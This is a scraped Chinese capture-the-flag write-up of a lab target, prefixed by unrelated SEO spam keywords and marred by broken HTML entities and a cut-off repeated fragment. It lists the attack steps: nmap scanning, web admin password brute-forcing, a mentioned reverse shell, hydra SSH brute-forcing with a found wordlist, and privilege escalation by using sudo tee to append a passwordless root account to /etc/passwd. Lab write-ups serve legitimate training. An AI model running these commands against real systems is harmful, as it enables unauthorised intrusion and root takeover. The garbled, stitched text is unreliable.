网站建设需要学什么语言,百度注册公司地址,移动网站做微信小程序,好公司网站建设价格kali#xff1a;192.168.111.111
靶机#xff1a;192.168.111.251
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --scripthttp-enum 192.168.111.251 访问目标网站发现需要登录 使用账号admin爆破出密码#xff1a;happy 登陆后抓包执行反弹shell 提权
在/home/jim/backu…kali192.168.111.111
靶机192.168.111.251
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --scripthttp-enum 192.168.111.251 访问目标网站发现需要登录 使用账号admin爆破出密码happy 登陆后抓包执行反弹shell 提权
在/home/jim/backups目录下发现密码字典 利用该字典爆破jim用户密码
hydra -l jim -P pass.txt 192.168.111.251 -s 22 ssh -t 64 查看jim用户的邮件发现用户charles的密码^xHhAhvim0y charles的sudo权限 提权方法tee | GTFOBins 写入用户到/etc/passwd
echo a::0:0::/root:/bin/bash | sudo -u root teehee -a /etc/passwd
su a flag
